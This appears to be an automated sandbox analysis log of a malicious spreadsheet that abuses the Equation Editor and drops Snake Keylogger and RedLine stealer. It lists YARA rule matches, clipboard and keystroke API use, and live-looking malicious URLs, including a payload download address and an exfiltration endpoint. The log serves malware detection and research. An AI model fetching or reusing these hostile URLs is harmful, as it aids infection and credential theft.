Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002458000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002528000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000003.526417075.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.00000000005B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://baitalasma.com/
Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://baitalasma.com/T7643
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://baitalasma.com/T76434567000.exe
Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://baitalasma.com/T76434567000.exeate
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://baitalasma.com/T76434567000.exeqqC:
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://baitalasma.com/T76434567000.exe~x
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.104
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.1044
Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://scratchdreams.tk
Source: RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://scratchdreams.tk/_send_.php?TS
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown HTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_00B8EAFF
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_00B8ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_0106ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_0106ED6A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 11_2_013AED6A
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_00B8EAFF
Source: C:\Users\user\AppData\Roaming\negrett.exe Code function: 5_2_00B7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 5_2_00B7AA57
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_01089576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 8_2_01089576
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 11_2_013C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 11_2_013C9576

System Summary

Source: sheet1.xml, type: SAMPLE Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_dafd640f-6
Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_bd735227-d
Source: negrett.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_59ed402a-6
Source: negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 